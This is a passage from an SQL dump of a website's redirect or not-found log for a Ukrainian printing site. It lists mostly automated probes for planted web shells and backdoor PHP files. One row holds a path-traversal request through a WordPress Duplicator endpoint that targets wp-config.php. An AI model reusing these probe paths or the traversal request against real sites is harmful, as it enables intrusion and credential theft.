00:00:00',301),(17700,'https://ekvatorprint.com.ua/.smileys/bacot.php',NULL,'http://site.ru','',2,0,'2020-07-12 08:55:54','0000-00-00 00:00:00',301),(17701,'https://ekvatorprint.com.ua/page.php',NULL,'http://site.ru','',2,0,'2020-07-12 09:33:59','0000-00-00 00:00:00',301),(17702,'https://ekvatorprint.com.ua/\",null,null,null,[],[],null,\"https:/googleads.g.doubleclick.net/pagead/conversion/?ai=c5sndfualx52xmto4yjdmu9gk8ydr8fbt5zitmgnh-n2yugeqascvp_wnykx2o4ami6abuvrpvgpiaqgpav3xpcvy1wm-qambyaplbkoevafp0f9t69uoq75fhl5xfdl-enue_j0wxauglmglxggentywno-zi5jaqdfa2agkuj4bxqiowpbtmfx5a_yuomlv7sbl29vesrjynfpdgwblzrwghm6qr9z93ltwgknfe0wocvlmyexweswewaj1dlqcakcklbrm_nt2mf5yitksxcql2l8gxpviz7bvwpc6xwuccw3ufqs7idrgsbc5unueay-mupchmyrrim2yhc7bvhn-akdc2rc3palgbcaejpv2zp0biaxsvo-ub9ggaoahrowwqaghjs4bqafvyruob5pyg6ghugaob_dzg6gh8tkbqaemvhuob-zvg6gh89ebqafs1ruob5byg6ghwtob2acboaj96d2wcalscaciggeqargfsqkvgo4k5kq8wyakazglacgladgtdiiudrold3d3lnvrci5uzxq',NULL,'','',1,0,'2020-07-13 04:16:24','0000-00-00 00:00:00',301),(17703,'https://ekvatorprint.com.ua/\",null,null,null,[],[],null,\"https:/googleads.g.doubleclick.net/pagead/conversion/?ai=cp79al-alx_6df9jhyvelqsgn8ydr8fbt5zitmgnh-n2yugeqascvp_wnykx2o4ami6abuvrpvgpiaqgpav3xpcvy1wm-qambyaplbkoevafp0ocoddjuf9cfjumtkifap5zvrc-rlyhpghemtjp12tiwlwepjszpwclxsy7z6j5zlqylzxctvgc1_qwrxmqhqympfvcuyhh4jw7fs0ejelrvr9gpra9b8c5cdw6lzj4awhfina3zhciycbnqw8d1hekaydo2qr8wcfijvpdjn52knrwcjjfspsj1-jqv3xnddccyneuofdn8u4js2uarwzcpjwreogrpnvgcvky5jnajkfjwuw9dq_0c_maejpv2zp0biaxsvo-ub9ggaoahrowwqaghjs4bqafvyruob5pyg6ghugaob_dzg6gh8tkbqaemvhuob-zvg6gh89ebqafs1ruob5byg6ghwtob2acboaj96d2wcalscaciggeqargfsqkvgo4k5kq8wyakazglacgladgtdiiudrold3d3lnvrci5uzxq',NULL,'','',1,0,'2020-07-13 04:18:32','0000-00-00 00:00:00',301),(17704,'https://ekvatorprint.com.ua/\",null,null,null,[],[],null,\"https:/googleads.g.doubleclick.net/pagead/conversion/?ai=cft_o7ualx6jfhcmxykdrp6ad8ydr8fbt5zitmgnh-n2yugeqascvp_wnykx2o4ami6abuvrpvgpiaqgpav3xpcvy1wm-qambyaplbkoevafp0aq4fy2q1iwt4zpgb52a5qwklwk1xebnacexi3aettyip_rotdjmks7yj3imushtaah4hngc1wtlox_bptljeybp07sanqtml1rq4ayzdhzwa5r9qasgmt6iusjhv6xj5tt4dyjy47xdqcc1lerfji6y9t1d7xcsyazvfksdpac143ltgzyykgywni1lwkucdgwuajre7u6h-q5pxzrngubmoihoymlizz5rjszuaqxxv6xfscp4bvsaksaejpv2zp0biaxsvo-ub9ggaoahrowwqaghjs4bqafvyruob5pyg6ghugaob_dzg6gh8tkbqaemvhuob-zvg6gh89ebqafs1ruob5byg6ghwtob2acboaj96d2wcalscaciggeqargfsqkvgo4k5kq8wyakazglacgladgtdiiudrold3d3lnvrci5uzxq',NULL,'','',1,0,'2020-07-13 04:19:59','0000-00-00 00:00:00',301),(17705,'https://ekvatorprint.com.ua/\",null,null,null,[],[],null,\"https:/googleads.g.doubleclick.net/pagead/conversion/?ai=cpo4fgoelx_ilkdfrytizlngi8ydr8fbt5zitmgnh-n2yugeqascvp_wnykx2o4ami6abuvrpvgpiaqgpav3xpcvy1wm-qambyaplbkoevafp0hxi1m_pzzvwhrfc7fy1d5hzw1bj9m15awmpfwxkm-bgxwy38h9yfqrogmw_3olwhssgdk9se9d0_z5mqsn6e1f_1el3vteaj0kiqy6kpvtaek8cv5bap5zpl76l5koxeuvnnhhkybbr5cw2jzzirtxemhu1cp6d5j_b1_v982udzn6j91lmysxgjuv5zkldp1er53fri49ssgmixq-wmpwgk8mhegrfagan6gyz4kdukpsrccwzd1aoqsaejpv2zp0biaxsvo-ub9ggaoahrowwqaghjs4bqafvyruob5pyg6ghugaob_dzg6gh8tkbqaemvhuob-zvg6gh89ebqafs1ruob5byg6ghwtob2acboaj96d2wcalscaciggeqargfsqkvgo4k5kq8wyakazglacgladgtdiiudrold3d3lnvrci5uzxq',NULL,'','',1,0,'2020-07-13 04:20:42','0000-00-00 00:00:00',301),(17706,'https://ekvatorprint.com.ua/wp-lgoin.php',NULL,'http://site.ru','',1,0,'2020-07-19 09:11:42','0000-00-00 00:00:00',301),(17707,'https://ekvatorprint.com.ua/new_side.php.suspected',NULL,'http://site.ru','',2,0,'2020-07-19 09:16:40','0000-00-00 00:00:00',301),(17708,'https://ekvatorprint.com.ua/cache/new_license.php.suspected',NULL,'http://site.ru','',2,0,'2020-07-19 09:35:59','0000-00-00 00:00:00',301),(17709,'https://ekvatorprint.com.ua/media-admin.php.suspected',NULL,'http://site.ru','',5,0,'2020-07-19 10:04:33','0000-00-00 00:00:00',301),(17710,'https://ekvatorprint.com.ua/default.php.suspected',NULL,'http://site.ru','',7,0,'2020-07-19 10:30:15','0000-00-00 00:00:00',301),(17711,'https://ekvatorprint.com.ua/administrator/components/com_admintools/views/acl/tmpl/ca.php',NULL,'http://site.ru','',3,0,'2020-07-19 12:13:01','0000-00-00 00:00:00',301),(17712,'https://ekvatorprint.com.ua/includes/wp-info.php',NULL,'http://site.ru','',2,0,'2020-07-19 12:49:57','0000-00-00 00:00:00',301),(17713,'https://ekvatorprint.com.ua/administrator/components/com_chronocontact/wizardthemes/default/elements.php',NULL,'http://site.ru','',1,0,'2020-07-19 16:51:22','0000-00-00 00:00:00',301),(17714,'https://ekvatorprint.com.ua/plugins/plugins.php',NULL,'http://site.ru','',2,0,'2020-07-19 17:16:02','0000-00-00 00:00:00',301),(17715,'https://ekvatorprint.com.ua/libraries/joomla/feed/zcysjindex.php',NULL,'http://site.ru','',2,0,'2020-07-19 17:38:55','0000-00-00 00:00:00',301),(17716,'https://ekvatorprint.com.ua/cli/cli.php',NULL,'http://site.ru','',5,0,'2020-07-19 19:00:04','0000-00-00 00:00:00',301),(17717,'https://ekvatorprint.com.ua/cache/wp_asx.php.suspected',NULL,'http://site.ru','',1,0,'2020-07-19 20:54:41','0000-00-00 00:00:00',301),(17718,'https://ekvatorprint.com.ua/portal/wp-includes/wlwmanifest.xml',NULL,'','',2,0,'2020-07-19 21:56:38','0000-00-00 00:00:00',301),(17719,'https://ekvatorprint.com.ua/controller.php',NULL,'http://site.ru','',5,0,'2020-07-20 00:02:05','0000-00-00 00:00:00',301),(17720,'https://ekvatorprint.com.ua/templates/beez3/info.php',NULL,'http://site.ru','',1,0,'2020-07-20 00:17:45','0000-00-00 00:00:00',301),(17721,'https://ekvatorprint.com.ua/administrator/includes/wp-rss.php',NULL,'http://site.ru','',1,0,'2020-07-20 01:19:36','0000-00-00 00:00:00',301),(17722,'https://ekvatorprint.com.ua/50.php',NULL,'http://site.ru','',3,0,'2020-07-20 04:46:56','0000-00-00 00:00:00',301),(17723,'https://ekvatorprint.com.ua/administrator/components/com_jshopping/importexport/simpleimport/form.php',NULL,'http://site.ru','',1,0,'2020-07-20 04:48:21','0000-00-00 00:00:00',301),(17724,'https://ekvatorprint.com.ua/libraries/pear/archive_tar/mark.php',NULL,'http://site.ru','',1,0,'2020-07-20 05:38:32','0000-00-00 00:00:00',301),(17725,'https://ekvatorprint.com.ua/cache/wp_asx.php',NULL,'http://site.ru','',2,0,'2020-07-20 05:58:46','0000-00-00 00:00:00',301),(17726,'https://ekvatorprint.com.ua/modules/mod_simplefileuploadv1.3/elements/elements.php',NULL,'http://site.ru','',1,0,'2020-07-20 09:34:42','0000-00-00 00:00:00',301),(17727,'https://ekvatorprint.com.ua/language/language.php',NULL,'http://site.ru','',2,0,'2020-07-20 09:55:55','0000-00-00 00:00:00',301),(17728,'https://ekvatorprint.com.ua/components/com_contact/views/contact/tmpl/controller.php',NULL,'http://site.ru','',4,0,'2020-07-20 10:43:53','0000-00-00 00:00:00',301),(17729,'https://ekvatorprint.com.ua/libraries/respectmuslims.php',NULL,'http://site.ru','',4,0,'2020-07-20 11:58:30','0000-00-00 00:00:00',301),(17730,'https://ekvatorprint.com.ua/seomarket.php.suspected',NULL,'http://site.ru','',1,0,'2020-07-20 12:08:04','0000-00-00 00:00:00',301),(17731,'https://ekvatorprint.com.ua/images/banners/images.php',NULL,'http://site.ru','',1,0,'2020-07-20 13:31:53','0000-00-00 00:00:00',301),(17732,'https://ekvatorprint.com.ua/wp-content/plugins/background-image-cropper/new_license.php.suspected',NULL,'http://site.ru','',2,0,'2020-07-20 17:40:36','0000-00-00 00:00:00',301),(17733,'https://ekvatorprint.com.ua/wp-includes/simplepie/pattern.php',NULL,'http://site.ru','',2,0,'2020-07-20 17:46:47','0000-00-00 00:00:00',301),(17734,'https://ekvatorprint.com.ua/ywdaxprdli.php',NULL,'http://site.ru','',1,0,'2020-07-20 18:38:10','0000-00-00 00:00:00',301),(17735,'https://ekvatorprint.com.ua/plugins/search/weblinks/new_side.php.suspected',NULL,'http://site.ru','',1,0,'2020-07-20 19:03:56','0000-00-00 00:00:00',301),(17736,'https://ekvatorprint.com.ua/wp-content/uploads/2019/03/content-post.php.suspected',NULL,'http://site.ru','',1,0,'2020-07-20 19:30:45','0000-00-00 00:00:00',301),(17737,'https://ekvatorprint.com.ua/wp-content/404.php',NULL,'http://site.ru','',1,0,'2020-07-20 20:01:17','0000-00-00 00:00:00',301),(17738,'https://ekvatorprint.com.ua/wp-admin/links.php',NULL,'http://site.ru','',5,0,'2020-07-20 20:51:27','0000-00-00 00:00:00',301),(17739,'https://ekvatorprint.com.ua/wp-content/uploads/2020/05/ups.php',NULL,'http://site.ru','',1,0,'2020-07-20 20:51:30','0000-00-00 00:00:00',301),(17740,'https://ekvatorprint.com.ua/wp-includes/widgets/class-wp-widget-header.php',NULL,'http://site.ru','',4,0,'2020-07-20 22:09:10','0000-00-00 00:00:00',301),(17741,'https://ekvatorprint.com.ua/content-pos.php.suspected',NULL,'http://site.ru','',1,0,'2020-07-20 22:12:34','0000-00-00 00:00:00',301),(17742,'https://ekvatorprint.com.ua/wp-content/uploads/2020/05/blackhat.php',NULL,'http://site.ru','',1,0,'2020-07-20 22:33:25','0000-00-00 00:00:00',301),(17743,'https://ekvatorprint.com.ua/wp-content/uploads/2020/06/doc.php',NULL,'http://site.ru','',2,0,'2020-07-20 22:37:27','0000-00-00 00:00:00',301),(17744,'https://ekvatorprint.com.ua/wp-includes/css/wp-pointer.php',NULL,'http://site.ru','',4,0,'2020-07-20 22:43:06','0000-00-00 00:00:00',301),(17745,'https://ekvatorprint.com.ua/plugins/content/sdc/helper.php',NULL,'http://site.ru','',1,0,'2020-07-20 23:04:23','0000-00-00 00:00:00',301),(17746,'https://ekvatorprint.com.ua/templates/marijuana.php',NULL,'http://site.ru','',1,0,'2020-07-20 23:14:06','0000-00-00 00:00:00',301),(17747,'https://ekvatorprint.com.ua/wp-content/plugins/background-image-cropper/ups.php.suspected',NULL,'http://site.ru','',1,0,'2020-07-20 23:41:07','0000-00-00 00:00:00',301),(17748,'https://ekvatorprint.com.ua/wp-content/plugins/background-image-cropper/content-post.php.suspected',NULL,'http://site.ru','',2,0,'2020-07-21 00:02:39','0000-00-00 00:00:00',301),(17749,'https://ekvatorprint.com.ua/administrator/components/com_jinc/classes/graphics/tmp-upload-images/magic.php.php',NULL,'http://site.ru','',1,0,'2020-07-21 01:11:22','0000-00-00 00:00:00',301),(17750,'https://ekvatorprint.com.ua/wp-admin/includes/images.php',NULL,'http://site.ru','',2,0,'2020-07-21 01:13:25','0000-00-00 00:00:00',301),(17751,'https://ekvatorprint.com.ua/wp-content/uploads/2018/12/content-post.php.suspected',NULL,'http://site.ru','',1,0,'2020-07-21 03:02:31','0000-00-00 00:00:00',301),(17752,'https://ekvatorprint.com.ua/wp-admin/user/include.php',NULL,'http://site.ru','',3,0,'2020-07-21 03:04:39','0000-00-00 00:00:00',301),(17753,'https://ekvatorprint.com.ua/wp-content/plugins/freedom/file.php',NULL,'http://site.ru','',2,0,'2020-07-21 03:28:41','0000-00-00 00:00:00',301),(17754,'https://ekvatorprint.com.ua/wp-content/themes/aemi1/footer1.php',NULL,'http://site.ru','',1,0,'2020-07-21 03:29:42','0000-00-00 00:00:00',301),(17755,'https://ekvatorprint.com.ua/cache/asdf.php.suspected',NULL,'http://site.ru','',1,0,'2020-07-21 04:24:37','0000-00-00 00:00:00',301),(17756,'https://ekvatorprint.com.ua/wp-content/plugins/background-image-cropper/ups.php',NULL,'http://site.ru','',5,0,'2020-07-21 04:44:52','0000-00-00 00:00:00',301),(17757,'https://ekvatorprint.com.ua/desk/uio.php.suspected',NULL,'http://site.ru','',1,0,'2020-07-21 05:11:22','0000-00-00 00:00:00',301),(17758,'https://ekvatorprint.com.ua/wp-content/uploads/2018/12/new_license.php.suspected',NULL,'http://site.ru','',1,0,'2020-07-21 05:20:50','0000-00-00 00:00:00',301),(17759,'https://ekvatorprint.com.ua/wp-content/themes/404.php',NULL,'http://site.ru','',2,0,'2020-07-21 06:58:08','0000-00-00 00:00:00',301),(17760,'https://ekvatorprint.com.ua/wp-admin/css/common.php',NULL,'http://site.ru','',3,0,'2020-07-21 06:58:43','0000-00-00 00:00:00',301),(17761,'https://ekvatorprint.com.ua/wp-content/plugins/wordpress-seo/admin/import/content-post.php.suspected',NULL,'http://site.ru','',1,0,'2020-07-21 08:26:17','0000-00-00 00:00:00',301),(17762,'https://ekvatorprint.com.ua/wp-content/themes/twentyseventeen/content-post.php',NULL,'http://site.ru','',2,0,'2020-07-21 08:30:03','0000-00-00 00:00:00',301),(17763,'https://ekvatorprint.com.ua/plugins/content/sdc/newsleter.php',NULL,'http://site.ru','',1,0,'2020-07-21 08:44:55','0000-00-00 00:00:00',301),(17764,'https://ekvatorprint.com.ua/wp-includes/simplepie/canonical.php',NULL,'http://site.ru','',2,0,'2020-07-21 11:50:52','0000-00-00 00:00:00',301),(17765,'https://ekvatorprint.com.ua/wp-content/plugins/background-image-cropper/wp-plugins.php',NULL,'http://site.ru','',3,0,'2020-07-21 12:14:51','0000-00-00 00:00:00',301),(17766,'https://ekvatorprint.com.ua/wp-content/uploads/2020/05/doc.php',NULL,'http://site.ru','',5,0,'2020-07-21 12:38:47','0000-00-00 00:00:00',301),(17767,'https://ekvatorprint.com.ua/wp-includes/simplepie/.0aefc.php.suspected',NULL,'http://site.ru','',1,0,'2020-07-21 13:00:19','0000-00-00 00:00:00',301),(17768,'https://ekvatorprint.com.ua/wp-content/plugins/background-image-cropper/doc.php',NULL,'http://site.ru','',10,0,'2020-07-21 13:39:16','0000-00-00 00:00:00',301),(17769,'https://ekvatorprint.com.ua/csv/smn.php',NULL,'http://site.ru','',2,0,'2020-07-21 13:47:32','0000-00-00 00:00:00',301),(17770,'https://ekvatorprint.com.ua/wp-includes/simplepie/cache/images.php',NULL,'http://site.ru','',1,0,'2020-07-21 13:49:16','0000-00-00 00:00:00',301),(17771,'https://ekvatorprint.com.ua/wp/wp-includes/js/swfupload/content-post.php.suspected',NULL,'http://site.ru','',2,0,'2020-07-21 13:51:36','0000-00-00 00:00:00',301),(17772,'https://ekvatorprint.com.ua/favicon.ico',NULL,'https://ekvatorprint.com.ua/printing-on-an-awning','',10242,0,'2020-07-21 14:14:53','0000-00-00 00:00:00',301),(17773,'https://ekvatorprint.com.ua/wp-includes/js/jquery/jquery.js',NULL,'','',11,0,'2020-07-21 14:25:26','0000-00-00 00:00:00',301),(17774,'https://ekvatorprint.com.ua/images/pwn.gif',NULL,'','',8,0,'2020-07-21 14:25:36','0000-00-00 00:00:00',301),(17775,'https://ekvatorprint.com.ua/images/stories/up.php',NULL,'','',12,0,'2020-07-21 14:25:38','0000-00-00 00:00:00',301),(17776,'https://ekvatorprint.com.ua/images/stories/pwn.gif',NULL,'','',12,0,'2020-07-21 14:25:38','0000-00-00 00:00:00',301),(17777,'https://ekvatorprint.com.ua/media/vuln.txt',NULL,'','',8,0,'2020-07-21 14:25:39','0000-00-00 00:00:00',301),(17778,'https://ekvatorprint.com.ua/wp-includes/js/include.php',NULL,'http://site.ru','',4,0,'2020-07-21 14:43:52','0000-00-00 00:00:00',301),(17779,'https://ekvatorprint.com.ua/modules/mod_logon/.logout.php.suspected',NULL,'http://site.ru','',1,0,'2020-07-21 15:09:21','0000-00-00 00:00:00',301),(17780,'https://ekvatorprint.com.ua/content.php.suspected',NULL,'http://site.ru','',3,0,'2020-07-21 15:28:18','0000-00-00 00:00:00',301),(17781,'https://ekvatorprint.com.ua/wp-content/plugins/background-image-cropper/new_license.php',NULL,'http://site.ru','',1,0,'2020-07-21 15:42:05','0000-00-00 00:00:00',301),(17782,'https://ekvatorprint.com.ua/wp-includes/theme-compat/sidebar-embed.php',NULL,'http://site.ru','',1,0,'2020-07-21 15:48:17','0000-00-00 00:00:00',301),(17783,'https://ekvatorprint.com.ua/wp-content/uploads/2018/11/content-post.php.suspected',NULL,'http://site.ru','',1,0,'2020-07-21 16:31:51','0000-00-00 00:00:00',301),(17784,'https://ekvatorprint.com.ua/wp-content/themes/cp20/content-post.php.suspected',NULL,'http://site.ru','',1,0,'2020-07-21 16:56:36','0000-00-00 00:00:00',301),(17785,'https://ekvatorprint.com.ua/wp-content/uploads/2020/05/ups.php.suspected',NULL,'http://site.ru','',1,0,'2020-07-21 17:18:03','0000-00-00 00:00:00',301),(17786,'https://ekvatorprint.com.ua/wp-includes/requests/cookie/images.php',NULL,'http://site.ru','',3,0,'2020-07-21 17:21:07','0000-00-00 00:00:00',301),(17787,'https://ekvatorprint.com.ua/wp-admin/css/colors/blue/images.php',NULL,'http://site.ru','',2,0,'2020-07-21 17:23:38','0000-00-00 00:00:00',301),(17788,'https://ekvatorprint.com.ua/wp-content/themes/aemi1/404.php',NULL,'http://site.ru','',1,0,'2020-07-21 17:49:21','0000-00-00 00:00:00',301),(17789,'https://ekvatorprint.com.ua/wp-content/plugins/background-image-cropper/simple.php5.suspected',NULL,'http://site.ru','',2,0,'2020-07-21 17:49:34','0000-00-00 00:00:00',301),(17790,'https://ekvatorprint.com.ua/apple-touch-icon-precomposed.png',NULL,'','',1823,0,'2020-07-21 19:38:24','0000-00-00 00:00:00',301),(17791,'https://ekvatorprint.com.ua/apple-touch-icon.png',NULL,'','',2346,0,'2020-07-21 19:38:24','0000-00-00 00:00:00',301),(17792,'https://ekvatorprint.com.ua/ads.txt',NULL,'','',1750,0,'2020-07-22 07:11:36','0000-00-00 00:00:00',301),(17793,'https://ekvatorprint.com.ua/apple-touch-icon-120x120-precomposed.png',NULL,'','',835,0,'2020-07-22 09:25:16','0000-00-00 00:00:00',301),(17794,'https://ekvatorprint.com.ua/apple-touch-icon-120x120.png',NULL,'','',836,0,'2020-07-22 09:25:16','0000-00-00 00:00:00',301),(17795,'https://ekvatorprint.com.ua/wp-login.php',NULL,'http://ekvatorprint.com.ua/wp-login.php','',1184,0,'2020-07-22 16:45:20','0000-00-00 00:00:00',301),(17796,'https://ekvatorprint.com.ua//wp-includes/wlwmanifest.xml',NULL,'','',71,0,'2020-07-22 17:13:23','0000-00-00 00:00:00',301),(17797,'https://ekvatorprint.com.ua//blog/wp-includes/wlwmanifest.xml',NULL,'','',74,0,'2020-07-22 17:13:24','0000-00-00 00:00:00',301),(17798,'https://ekvatorprint.com.ua//web/wp-includes/wlwmanifest.xml',NULL,'','',73,0,'2020-07-22 17:13:24','0000-00-00 00:00:00',301),(17799,'https://ekvatorprint.com.ua//wordpress/wp-includes/wlwmanifest.xml',NULL,'','',72,0,'2020-07-22 17:13:25','0000-00-00 00:00:00',301),(17800,'https://ekvatorprint.com.ua//website/wp-includes/wlwmanifest.xml',NULL,'','',74,0,'2020-07-22 17:13:25','0000-00-00 00:00:00',301),(17801,'https://ekvatorprint.com.ua//wp/wp-includes/wlwmanifest.xml',NULL,'','',74,0,'2020-07-22 17:13:25','0000-00-00 00:00:00',301),(17802,'https://ekvatorprint.com.ua//news/wp-includes/wlwmanifest.xml',NULL,'','',73,0,'2020-07-22 17:13:25','0000-00-00 00:00:00',301),(17803,'https://ekvatorprint.com.ua//2018/wp-includes/wlwmanifest.xml',NULL,'','',46,0,'2020-07-22 17:13:25','0000-00-00 00:00:00',301),(17804,'https://ekvatorprint.com.ua//2019/wp-includes/wlwmanifest.xml',NULL,'','',65,0,'2020-07-22 17:13:26','0000-00-00 00:00:00',301),(17805,'https://ekvatorprint.com.ua//shop/wp-includes/wlwmanifest.xml',NULL,'','',66,0,'2020-07-22 17:13:26','0000-00-00 00:00:00',301),(17806,'https://ekvatorprint.com.ua//wp1/wp-includes/wlwmanifest.xml',NULL,'','',74,0,'2020-07-22 17:13:26','0000-00-00 00:00:00',301),(17807,'https://ekvatorprint.com.ua//test/wp-includes/wlwmanifest.xml',NULL,'','',75,0,'2020-07-22 17:13:26','0000-00-00 00:00:00',301),(17808,'https://ekvatorprint.com.ua//media/wp-includes/wlwmanifest.xml',NULL,'','',49,0,'2020-07-22 17:13:26','0000-00-00 00:00:00',301),(17809,'https://ekvatorprint.com.ua//wp2/wp-includes/wlwmanifest.xml',NULL,'','',74,0,'2020-07-22 17:13:27','0000-00-00 00:00:00',301),(17810,'https://ekvatorprint.com.ua//site/wp-includes/wlwmanifest.xml',NULL,'','',76,0,'2020-07-22 17:13:27','0000-00-00 00:00:00',301),(17811,'https://ekvatorprint.com.ua//cms/wp-includes/wlwmanifest.xml',NULL,'','',75,0,'2020-07-22 17:13:27','0000-00-00 00:00:00',301),(17812,'https://ekvatorprint.com.ua//sito/wp-includes/wlwmanifest.xml',NULL,'','',74,0,'2020-07-22 17:13:27','0000-00-00 00:00:00',301),(17813,'https://ekvatorprint.com.ua/app-ads.txt',NULL,'','',317,0,'2020-07-22 23:34:40','0000-00-00 00:00:00',301),(17814,'https://ekvatorprint.com.ua/top.php',NULL,'http://site.ru','',3,0,'2020-07-23 06:25:39','0000-00-00 00:00:00',301),(17815,'https://ekvatorprint.com.ua/wp-admin/admin-ajax.php?action=duplicator_download&file=../wp-config.php',NULL,'','',1,0,'2020-07-23 14:51:02','0000-00-00 00:00:00',301),(17816,'https://ekvatorprint.com.ua/sl.php',NULL,'http://site.ru','',3,0,'2020-07-23 16:52:36','0000-00-00 00:00:00',301),(17817,'https://ekvatorprint.com.ua/components/com_weblinks/views/vdrh.php.suspected',NULL,'http://site.ru','',1,0,'2020-07-23 18:11:50','0000-00-00 00:00:00',301),(17818,'https://ekvatorprint.com.ua/categories.php',NULL,'http://site.ru','',1,0,'2020-07-23 20:12:41','0000-00-00 00:00:00',301),(17819,'https://ekvatorprint.com.ua/dwsonv.php.suspected',NULL,'http://site.ru','',2,0,'2020-07-23 20:18:28','0000-00-00 00:00:00',301),(17820,'https://ekvatorprint.com.ua/freshrdp.com1.php',NULL,'http://site.ru','',1,0,'2020-07-23 21:11:34','0000-00-00 00:00:00',301),(17821,'https://ekvatorprint.com.ua/language/lv-lv/lv-lv.localise2.php',NULL,'http://site.ru','',6,0,'2020-07-23 21:39:05','0000-00-00 00:00:00',301),(17822,'https://ekvatorprint.com.ua/settings_auto.php',NULL,'http://site.ru','',1,0,'2020-07-23 22:02:18','0000-00-00 00:00:00',301),(17823,'https://ekvatorprint.com.ua/mrswenvsr.php',NULL,'http://site.ru','',2,0,'2020-07-23 22:06:40','0000-00-00 00:00:00',301),(17824,'https://ekvatorprint.com.ua/peridot/popup-pomo.php',NULL,'http://site.ru','',3,0,'2020-07-23 22:57:40','0000-00-00 00:00:00',301),(17825,'https://ekvatorprint.com.ua/modules/mod_widgetkit_twitter/wp-update.php',NULL,'http://site.ru','',3,0,'2020-07-23 23:25:20','0000-00-00 00:00:00',301),(17826,'https://ekvatorprint.com.ua/tm8q4n.php',NULL,'http://site.ru','',3,0,'2020-07-24 01:28:45','0000-00-00 00:00:00',301),(17827,'https://ekvatorprint.com.ua/index1.php',NULL,'http://site.ru','',3,0,'2020-07-24 02:45:08','0000-00-00 00:00:00',301),(17828,'https://ekvatorprint.com.ua/libraries/joomla/template/feal.php',NULL,'http://site.ru','',1,0,'2020-07-25 01:47:31','0000-00-00 00:00:00',301),(17829,'https://ekvatorprint.com.ua/catchyourcheatingwife.com/wp-logout.php.suspected',NULL,'http://site.ru','',3,0,'2020-07-25 02:35:36','0000-00-00 00:00:00',301),(17830,'https://ekvatorprint.com.ua/user-profile.php',NULL,'http://site.ru','',2,0,'2020-07-25 02:44:28','0000-00-00 00:00:00',301),(17831,'https://ekvatorprint.com.ua/wp-form.php',NULL,'http://site.ru','',6,0,'2020-07-25 03:05:22','0000-00-00 00:00:00',301),(17832,'https://ekvatorprint.com.ua/config-sample.php',NULL,'http://site.ru','',1,0,'2020-07-25 04:07:53','0000-00-00 00:00:00',301),(17833,'https://ekvatorprint.com.ua/components/s.php',NULL,'http://site.ru','',2,0,'2020-07-25 05:57:09','0000-00-00 00:00:00',301),(17834,'https://ekvatorprint.com.ua/indexe.php',NULL,'http://site.ru','',2,0,'2020-07-25 06:00:43','0000-00-00 00:00:00',301),(17835,'https://ekvatorprint.com.ua/humans.txt',NULL,'http://ekvatorprint.com.ua/humans.txt','',77,0,'2020-07-26 02:16:07','0000-00-00 00:00:00',301),(17836,'https://ekvatorprint.com.ua/wp-log.php',NULL,'http://site.ru','',2,0,'2020-07-26 04:36:48','0000-00-00 00:00:00',301),(17837,'https://ekvatorprint.com.ua/templates/atomic/o.php',NULL,'http://site.ru','',2,0,'2020-07-26 05:00:12','0000-00-00 00:00:00',301),(17838,'https://ekvatorprint.com.ua/s.php.suspected',NULL,'http://site.ru','',2,0,'2020-07-26 05:26:52','0000-00-00 00:00:00',301),(17839,'https://ekvatorprint.com.ua/images/slider/404.php',NULL,'http://site.ru','',2,0,'2020-07-26 08:44:21','0000-00-00 00:00:00',301),(17840,'https://ekvatorprint.com.ua/telsip.mx/docindex.php',NULL,'http://site.ru','',3,0,'2020-07-26 09:40:34','0000-00-00 00:00:00',301),(17841,'https://ekvatorprint.com.ua/banner-printing/templates/gk_ilife/favicon.ico',NULL,'','',6,0,'2020-07-26 12:30:56','0000-00-00 00:00:00',301),(17842,'https://ekvatorprint.com.ua/wp-content/themes/weekender/friend.php',NULL,'','',1,0,'2020-07-26 13:27:39','0000-00-00 00:00:00',301),(17843,'https://ekvatorprint.com.ua/wp-content/themes/attitude/go.php',NULL,'','',1,0,'2020-07-26 13:27:41','0000-00-00 00:00:00',301),(17844,'https://ekvatorprint.com.ua/wp-content/themes/eatery/nav.php',NULL,'','',4,0,'2020-07-26 13:27:43','0000-00-00 00:00:00',301),(17845,'https://ekvatorprint.com.ua/wp-content/themes/justnews-child/go.php',NULL,'','',1,0,'2020-07-26 13:27:45','0000-00-00 00:00:00',301),(17846,'https://ekvatorprint.com.ua/wp-content/themes/nashvilleparent/directory-click-thru.php',NULL,'','',2,0,'2020-07-26 13:27:50','0000-00-00 00:00:00',301),(17847,'https://ekvatorprint.com.ua/components/com_foxcontact/mini.php',NULL,'http://site.ru','',4,0,'2020-07-26 21:20:43','0000-00-00 00:00:00',301),(17848,'https://ekvatorprint.com.ua/wp-cent.php',NULL,'http://site.ru','',1,0,'2020-07-27 00:18:10','0000-00-00 00:00:00',301),(17849,'https://ekvatorprint.com.ua/components/com_banners/models/images.php',NULL,'http://site.ru','',2,0,'2020-07-27 03:15:30','0000-00-00 00:00:00',301),(17850,'https://ekvatorprint.com.ua/paypal/popup-pomo.php',NULL,'http://site.ru','',2,0,'2020-07-27 03:23:47','0000-00-00 00:00:00',301),(17851,'https://ekvatorprint.com.ua/kadvl.php',NULL,'http://site.ru','',2,0,'2020-07-27 03:41:53','0000-00-00 00:00:00',301),(17852,'https://ekvatorprint.com.ua/wp-words.php',NULL,'http://site.ru','',3,0,'2020-07-27 04:01:41','0000-00-00 00:00:00',301),(17853,'https://ekvatorprint.com.ua/header.php',NULL,'http://site.ru','',1,0,'2020-07-27 05:26:27','0000-00-00 00:00:00',301),(17854,'https://ekvatorprint.com.ua/procate/popup-pomo.php',NULL,'http://site.ru','',1,0,'2020-07-27 08:25:18','0000-00-00 00:00:00',301),(17855,'https://ekvatorprint.com.ua/cli/system_infos.php',NULL,'http://site.ru','',2,0,'2020-07-27 08:50:30','0000-00-00 00:00:00',301),(17856,'https://ekvatorprint.com.ua/wp-info.php.suspected',NULL,'http://site.ru','',4,0,'2020-07-27 10:01:33','0000-00-00 00:00:00',301),(17857,'https://ekvatorprint.com.ua/plugins/editors/codemirror/images.php',NULL,'http://site.ru','',3,0,'2020-07-27 14:43:59','0000-00-00 00:00:00',301),(17858,'https://ekvatorprint.com.ua/mod_config.php.suspected',NULL,'http://site.ru','',2,0,'2020-07-27 17:33:00','0000-00-00 00:00:00',301),(17859,'https://ekvatorprint.com.ua/evnsjg.php',NULL,'http://site.ru','',3,0,'2020-07-27 18:47:35','0000-00-00 00:00:00',301),(17860,'https://ekvatorprint.com.ua/backup/meuhy.php',NULL,'http://site.ru','',2,0,'2020-07-27 19:40:44','0000-00-00 00:00:00',301),(17861,'https://ekvatorprint.com.ua/https://ekvatorprint.com.ua/images/modulnie kartini/мк-129.png',NULL,'','',81,0,'2020-07-27 19:45:58','0000-00-00 